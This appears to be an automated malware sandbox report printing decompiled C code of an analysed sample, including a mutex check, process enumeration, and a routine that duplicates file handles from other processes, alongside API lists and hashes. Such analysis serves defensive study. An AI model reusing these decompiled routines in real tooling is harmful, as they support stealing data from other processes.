                                                                                                                                                      0x1001f5ef

                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 1001F5A4
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F5B2
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F5C0
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F5DB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$System$File$__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3735792614-0
                                                                                                                                                      • Opcode ID: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction ID: fa02b7a9fed9572687d28a8f87146f07c02dbb090ec293c5d85fe2b1344f7672
                                                                                                                                                      • Opcode Fuzzy Hash: c5081578e9fd931923cb91727b204842aed61b67563f5adf44f10d167ea8ffdf
                                                                                                                                                      • Instruction Fuzzy Hash: 9301E575D1021DAADB00DFE4C8899EEB7B8FF04304F109649E904A7250E779A64ACBA9
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A0F0, Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A0F0(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}







                                                                                                                                                      0x1001a0f6
                                                                                                                                                      0x1001a0fd
                                                                                                                                                      0x1001a10a
                                                                                                                                                      0x1001a11a
                                                                                                                                                      0x1001a120
                                                                                                                                                      0x1001a127
                                                                                                                                                      0x1001a131
                                                                                                                                                      0x1001a144
                                                                                                                                                      0x1001a14b
                                                                                                                                                      0x1001a15a
                                                                                                                                                      0x1001a15a
                                                                                                                                                      0x1001a167

                                                                                                                                                      APIs
                                                                                                                                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A10A
                                                                                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A11A
                                                                                                                                                      • CreateMutexA.KERNEL32(0000000C,00000000,10020584), ref: 1001A13E
                                                                                                                                                      • GetLastError.KERNEL32 ref: 1001A14D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4085719312-0
                                                                                                                                                      • Opcode ID: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction ID: 94a843d0d969dde2b410f28b1faa04b0eb5ecf9004c44cc09fbfa4c27db3ef7e
                                                                                                                                                      • Opcode Fuzzy Hash: 85a6fd12354dd419dd0ef30a81820dc56bd3bdf0a7a4bd4704583f47520dfa93
                                                                                                                                                      • Instruction Fuzzy Hash: 5A01BF70900309DFEB10DF90C999BDEBBB4EB08705F604504E605B6290D7B59A85CBB5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100026D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E100026D0(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10022D98);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001E70( &_v56,  &_v84);
				E1000EBEB( &_v56, 0x103307a8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}









                                                                                                                                                      0x100026d3
                                                                                                                                                      0x100026d5
                                                                                                                                                      0x100026e0
                                                                                                                                                      0x100026e1
                                                                                                                                                      0x100026f3
                                                                                                                                                      0x100026f8
                                                                                                                                                      0x10002706
                                                                                                                                                      0x10002714
                                                                                                                                                      0x10002719
                                                                                                                                                      0x10002723
                                                                                                                                                      0x1000272b
                                                                                                                                                      0x10002735

                                                                                                                                                      APIs
                                                                                                                                                      • std::bad_exception::bad_exception.LIBCMTD ref: 10002706
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10002714
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                      • API String ID: 1843230569-3788999226
                                                                                                                                                      • Opcode ID: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction ID: 1a2e96a28b8215f22a0e790cb2dc9ca4275ca3d727c061adff09d24352fe5d00
                                                                                                                                                      • Opcode Fuzzy Hash: d6cada7001f69a800286162e9fcab198a3ba3934b13d850f72d45b17b4c01992
                                                                                                                                                      • Instruction Fuzzy Hash: 31F05876804548EBDB14DBD4DD81BEEB778FB047A0F900728F522676C4DB342A05CB80
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000442C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F00B(E10022968, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001D90(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
				E1000EBEB(_t25 - 0x50, 0x10330158);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100232c8;
				return _t23;
			}








                                                                                                                                                      0x1000442c
                                                                                                                                                      0x1000442c
                                                                                                                                                      0x10004433
                                                                                                                                                      0x10004440
                                                                                                                                                      0x10004445
                                                                                                                                                      0x10004445
                                                                                                                                                      0x1000444d
                                                                                                                                                      0x10004450
                                                                                                                                                      0x1000445e
                                                                                                                                                      0x10004465
                                                                                                                                                      0x1000446a
                                                                                                                                                      0x1000446b
                                                                                                                                                      0x10004470
                                                                                                                                                      0x10004472
                                                                                                                                                      0x10004477
                                                                                                                                                      0x10004480

                                                                                                                                                      APIs
                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 10004433
                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10004465
                                                                                                                                                        • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330750,103332E0), ref: 1000EC2B
                                                                                                                                                        • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
                                                                                                                                                      Strings
                                                                                                                                                      • invalid string position, xrefs: 10004438
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                      • API String ID: 2977319401-1799206989
                                                                                                                                                      • Opcode ID: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction ID: a56476a32a0c337bfade56aca9773eeef8d3bbd0f37adf4676240551fddf05bf
                                                                                                                                                      • Opcode Fuzzy Hash: 8c5585535794f9a1e6dadcd63e0675b21dc6b9f2d0e27e7cb116dd0b948fe66e
                                                                                                                                                      • Instruction Fuzzy Hash: 6CE09275800198EBD710DBD4EC41ADEB778EF04390F80881AF605BB20ACBB5A948CB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: 1611970637183.exe PID: 6028 Parent PID: 476 1611970637183.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 0040CE93, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122processlibraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				void _v1102;
				void* _v1104;
				intOrPtr _v1636;
				long _v1652;
				void _v1656;
				void* _v1660;
				void* __edi;
				void* __esi;
				void* _t42;
				long _t50;
				void* _t51;
				void* _t57;
				struct HINSTANCE__* _t69;
				void* _t71;
				void* _t72;
				int _t73;
				intOrPtr _t79;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = _a4;
				_t2 = _t79 + 0x2c; // 0x40c800
				E00403F55(_t2);
				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t42;
				memset( &_v1656, 0, 0x228);
				_t85 = _t84 + 0xc;
				_v1660 = 0x22c;
				Process32FirstW(_v12,  &_v1660); // executed
				while(Process32NextW(_v12,  &_v1660) != 0) {
					E0040C997( &_v580);
					_t50 = _v1652;
					_v580 = _t50;
					_v52 = _v1636;
					_t51 = OpenProcess(0x410, 0, _t50);
					__eflags = _t51;
					_v8 = _t51;
					if(_t51 != 0) {
						L4:
						_v1104 = 0;
						memset( &_v1102, 0, 0x208);
						_t86 = _t85 + 0xc;
						E0040D049(_t79, _v8,  &_v1104);
						__eflags = _v1104;
						if(_v1104 == 0) {
							L6:
							__eflags =  *0x4136ec; // 0x1
							_v16 = 0x104;
							if(__eflags == 0) {
								_t69 = GetModuleHandleW(L"kernel32.dll");
								__eflags = _t69;
								if(_t69 != 0) {
									 *0x4136ec = 1;
									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
								}
							}
							_t57 =  *0x4136f0;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
							}
							L11:
							E0040CAF2( &_v576,  &_v1104);
							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t85 = _t86 + 0x14;
							CloseHandle(_v8);
							_t79 = _a4;
							L12:
							_t37 = _t79 + 0x2c; // 0x40c800
							E0040D0D3(_t37,  &_v580);
							continue;
						}
						__eflags = _v1104 - 0x3f;
						if(_v1104 != 0x3f) {
							goto L11;
						}
						goto L6;
					}
					_t71 = E004058FB();
					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
						goto L12;
					}
					_t72 = OpenProcess(0x1000, 0, _v580);
					__eflags = _t72;
					_v8 = _t72;
					if(_t72 == 0) {
						goto L12;
					}
					goto L4;
				}
				_t73 = FindCloseChangeNotification(_v12); // executed
				return _t73;
			}

































                                                                                                                                                      0x0040ce9f
                                                                                                                                                      0x0040cea2
                                                                                                                                                      0x0040cea5
                                                                                                                                                      0x0040ceaf
                                                                                                                                                      0x0040ceb9
                                                                                                                                                      0x0040cec4
                                                                                                                                                      0x0040cec9
                                                                                                                                                      0x0040ced6
                                                                                                                                                      0x0040cee0
                                                                                                                                                      0x0040d022
                                                                                                                                                      0x0040cef0
                                                                                                                                                      0x0040cef5
                                                                                                                                                      0x0040cf0e
                                                                                                                                                      0x0040cf14
                                                                                                                                                      0x0040cf17
                                                                                                                                                      0x0040cf19
                                                                                                                                                      0x0040cf1b
                                                                                                                                                      0x0040cf1e
                                                                                                                                                      0x0040cf48
                                                                                                                                                      0x0040cf55
                                                                                                                                                      0x0040cf5c
                                                                                                                                                      0x0040cf61
                                                                                                                                                      0x0040cf70
                                                                                                                                                      0x0040cf75
                                                                                                                                                      0x0040cf7c
                                                                                                                                                      0x0040cf88
                                                                                                                                                      0x0040cf88
                                                                                                                                                      0x0040cf8e
                                                                                                                                                      0x0040cf95
                                                                                                                                                      0x0040cf9c
                                                                                                                                                      0x0040cfa2
                                                                                                                                                      0x0040cfa4
                                                                                                                                                      0x0040cfac
                                                                                                                                                      0x0040cfbc
                                                                                                                                                      0x0040cfbc
                                                                                                                                                      0x0040cfa4
                                                                                                                                                      0x0040cfc1
                                                                                                                                                      0x0040cfc6
                                                                                                                                                      0x0040cfc8
                                                                                                                                                      0x0040cfd9
                                                                                                                                                      0x0040cfd9
                                                                                                                                                      0x0040cfdb
                                                                                                                                                      0x0040cfe7
                                                                                                                                                      0x0040cfff
                                                                                                                                                      0x0040d004
                                                                                                                                                      0x0040d00a
                                                                                                                                                      0x0040d010
                                                                                                                                                      0x0040d013
                                                                                                                                                      0x0040d01a
                                                                                                                                                      0x0040d01d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d01d
                                                                                                                                                      0x0040cf7e
                                                                                                                                                      0x0040cf86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf86
                                                                                                                                                      0x0040cf20
                                                                                                                                                      0x0040cf25
                                                                                                                                                      0x0040cf29
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf3b
                                                                                                                                                      0x0040cf3d
                                                                                                                                                      0x0040cf3f
                                                                                                                                                      0x0040cf42
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040cf42
                                                                                                                                                      0x0040d03c
                                                                                                                                                      0x0040d046

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
                                                                                                                                                      • memset.MSVCRT ref: 0040CEC4
                                                                                                                                                      • Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
                                                                                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
                                                                                                                                                      • memset.MSVCRT ref: 0040CF5C
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
                                                                                                                                                      • QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
                                                                                                                                                      • Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CloseHandleOpenProcess32memset$AddressChangeCreateFindFirstFullImageModuleNameNextNotificationProcQuerySnapshotToolhelp32free
                                                                                                                                                      • String ID: ?$QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                      • API String ID: 299891297-1549906504
                                                                                                                                                      • Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                      • Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
                                                                                                                                                      • Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                      • Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C6FB, Relevance: 19.7, APIs: 13, Instructions: 207fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				char _v56;
				int _v60;
				intOrPtr _v64;
				int _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				void _v622;
				short _v624;
				char _v1616;
				void _v1623;
				char _v1624;
				void* __esi;
				void* _t97;
				void* _t99;
				long _t101;
				intOrPtr _t102;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t128;
				void* _t131;
				signed char* _t152;
				void* _t153;
				void** _t154;
				void*** _t155;
				intOrPtr _t158;
				signed short* _t159;
				void* _t163;
				void* _t164;
				void* _t165;

				_t165 = __eflags;
				_t155 = __eax;
				_v28 = 0;
				_v32 = 0;
				_v624 = 0;
				memset( &_v622, 0, 0x208);
				E00405800( &_v624);
				_t164 = _t163 + 0x10;
				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v12 = _t97;
				_t99 = E0040C572(_t155, _t165); // executed
				_v16 = _t99;
				FindCloseChangeNotification(_v12); // executed
				_t154 =  *_t155;
				_t101 = GetCurrentProcessId();
				if(_v16 == 0) {
					_t153 =  *_t154;
					if(_t153 > 0) {
						_t152 =  &(_t154[2]);
						do {
							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
								_v32 =  *_t152 & 0x000000ff;
							}
							_t152 =  &(_t152[0x10]);
							_t153 = _t153 - 1;
							_t170 = _t153;
						} while (_t153 != 0);
					}
				}
				_t102 = 0x20;
				_v64 = _t102;
				_v48 = _t102;
				_v72 = 0;
				_v60 = 0;
				_v68 = 0;
				_v56 = 0;
				_v44 = 0;
				_v52 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0040CE93(_t153, _t170,  &_v100); // executed
				_v20 = 0;
				if(_v44 > 0) {
					do {
						_t110 = E0040C982(_v20,  &_v56);
						_t36 = _t110 + 4; // 0x4
						_v12 = _t110;
						_t111 = E00405888(_t36);
						_t158 = _a4;
						_v16 = _t111;
						_v8 = 0;
						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
							goto L26;
						} else {
							while(1) {
								_t114 = E00406306(_t158, _v8);
								_push(_v16);
								_push(_t114);
								L0040E03E();
								if(_t114 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
									continue;
								} else {
									goto L26;
								}
								goto L27;
							}
							_t116 = OpenProcess(0x40, 0,  *_v12);
							__eflags = _t116;
							_v16 = _t116;
							if(_t116 != 0) {
								__eflags =  *_t154;
								_v24 = 0;
								if( *_t154 > 0) {
									_t159 =  &(_t154[1]);
									do {
										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
										if(( *_t159 & 0x0000ffff) !=  *_v12) {
											goto L21;
										} else {
											__eflags = (_t159[2] & 0x000000ff) - _v32;
											if((_t159[2] & 0x000000ff) != _v32) {
												goto L21;
											} else {
												_v8 = 0;
												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
												__eflags = _v8;
												if(_v8 == 0) {
													goto L21;
												} else {
													_v1624 = 0;
													memset( &_v1623, 0, 0x3e7);
													_t164 = _t164 + 0xc;
													_v36 = 0;
													E0040C41D();
													_t128 =  *0x4132a8;
													__eflags = _t128;
													if(_t128 != 0) {
														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
													}
													CloseHandle(_v8);
													_v40 = E00405888( &_v1616);
													_t131 = E00405888(_a8);
													_push(_t131);
													_push(_v40);
													L0040E03E();
													__eflags = _t131;
													if(_t131 == 0) {
														 *_a12 =  *_v12;
														_v28 = 1;
														 *_a16 = _t159[3] & 0x0000ffff;
													} else {
														goto L21;
													}
												}
											}
										}
										goto L24;
										L21:
										_v24 = _v24 + 1;
										_t159 =  &(_t159[8]);
										__eflags = _v24 -  *_t154;
									} while (_v24 <  *_t154);
								}
								L24:
								CloseHandle(_v16);
							}
							__eflags = _v28;
							if(_v28 == 0) {
								goto L26;
							}
						}
						goto L27;
						L26:
						_v20 = _v20 + 1;
					} while (_v20 < _v44);
				}
				L27:
				if(_v100 != 0) {
					FreeLibrary(_v100); // executed
					_v100 = 0;
				}
				E00403F55( &_v56);
				E00403F55( &_v72);
				return _v28;
			}




















































                                                                                                                                                      0x0040c6fb
                                                                                                                                                      0x0040c70e
                                                                                                                                                      0x0040c718
                                                                                                                                                      0x0040c71b
                                                                                                                                                      0x0040c71e
                                                                                                                                                      0x0040c725
                                                                                                                                                      0x0040c731
                                                                                                                                                      0x0040c736
                                                                                                                                                      0x0040c74c
                                                                                                                                                      0x0040c752
                                                                                                                                                      0x0040c757
                                                                                                                                                      0x0040c75f
                                                                                                                                                      0x0040c762
                                                                                                                                                      0x0040c768
                                                                                                                                                      0x0040c76a
                                                                                                                                                      0x0040c773
                                                                                                                                                      0x0040c775
                                                                                                                                                      0x0040c779
                                                                                                                                                      0x0040c77b
                                                                                                                                                      0x0040c77e
                                                                                                                                                      0x0040c784
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c792
                                                                                                                                                      0x0040c795
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c798
                                                                                                                                                      0x0040c77e
                                                                                                                                                      0x0040c779
                                                                                                                                                      0x0040c79d
                                                                                                                                                      0x0040c79e
                                                                                                                                                      0x0040c7a1
                                                                                                                                                      0x0040c7a8
                                                                                                                                                      0x0040c7ab
                                                                                                                                                      0x0040c7ae
                                                                                                                                                      0x0040c7b1
                                                                                                                                                      0x0040c7b4
                                                                                                                                                      0x0040c7b7
                                                                                                                                                      0x0040c7ba
                                                                                                                                                      0x0040c7bd
                                                                                                                                                      0x0040c7c0
                                                                                                                                                      0x0040c7c3
                                                                                                                                                      0x0040c7c6
                                                                                                                                                      0x0040c7c9
                                                                                                                                                      0x0040c7cc
                                                                                                                                                      0x0040c7cf
                                                                                                                                                      0x0040c7d7
                                                                                                                                                      0x0040c7da
                                                                                                                                                      0x0040c7e0
                                                                                                                                                      0x0040c7e6
                                                                                                                                                      0x0040c7eb
                                                                                                                                                      0x0040c7ee
                                                                                                                                                      0x0040c7f1
                                                                                                                                                      0x0040c7f6
                                                                                                                                                      0x0040c7fc
                                                                                                                                                      0x0040c7ff
                                                                                                                                                      0x0040c802
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c808
                                                                                                                                                      0x0040c808
                                                                                                                                                      0x0040c80d
                                                                                                                                                      0x0040c812
                                                                                                                                                      0x0040c815
                                                                                                                                                      0x0040c816
                                                                                                                                                      0x0040c81f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c821
                                                                                                                                                      0x0040c82a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c82c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c82c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c82a
                                                                                                                                                      0x0040c839
                                                                                                                                                      0x0040c83f
                                                                                                                                                      0x0040c841
                                                                                                                                                      0x0040c844
                                                                                                                                                      0x0040c84a
                                                                                                                                                      0x0040c84c
                                                                                                                                                      0x0040c84f
                                                                                                                                                      0x0040c855
                                                                                                                                                      0x0040c858
                                                                                                                                                      0x0040c85e
                                                                                                                                                      0x0040c860
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c866
                                                                                                                                                      0x0040c86a
                                                                                                                                                      0x0040c86d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c873
                                                                                                                                                      0x0040c87f
                                                                                                                                                      0x0040c891
                                                                                                                                                      0x0040c897
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c89c
                                                                                                                                                      0x0040c8a9
                                                                                                                                                      0x0040c8af
                                                                                                                                                      0x0040c8b4
                                                                                                                                                      0x0040c8b7
                                                                                                                                                      0x0040c8ba
                                                                                                                                                      0x0040c8bf
                                                                                                                                                      0x0040c8c4
                                                                                                                                                      0x0040c8c6
                                                                                                                                                      0x0040c8dd
                                                                                                                                                      0x0040c8dd
                                                                                                                                                      0x0040c8e2
                                                                                                                                                      0x0040c8f6
                                                                                                                                                      0x0040c8f9
                                                                                                                                                      0x0040c8fe
                                                                                                                                                      0x0040c8ff
                                                                                                                                                      0x0040c902
                                                                                                                                                      0x0040c907
                                                                                                                                                      0x0040c90b
                                                                                                                                                      0x0040c928
                                                                                                                                                      0x0040c931
                                                                                                                                                      0x0040c938
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c90b
                                                                                                                                                      0x0040c89a
                                                                                                                                                      0x0040c86d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040c90d
                                                                                                                                                      0x0040c90d
                                                                                                                                                      0x0040c913
                                                                                                                                                      0x0040c916
                                                                                                                                                      0x0040c916
                                                                                                                                                      0x0040c91e
                                                                                                                                                      0x0040c93a
                                                                                                                                                      0x0040c93d
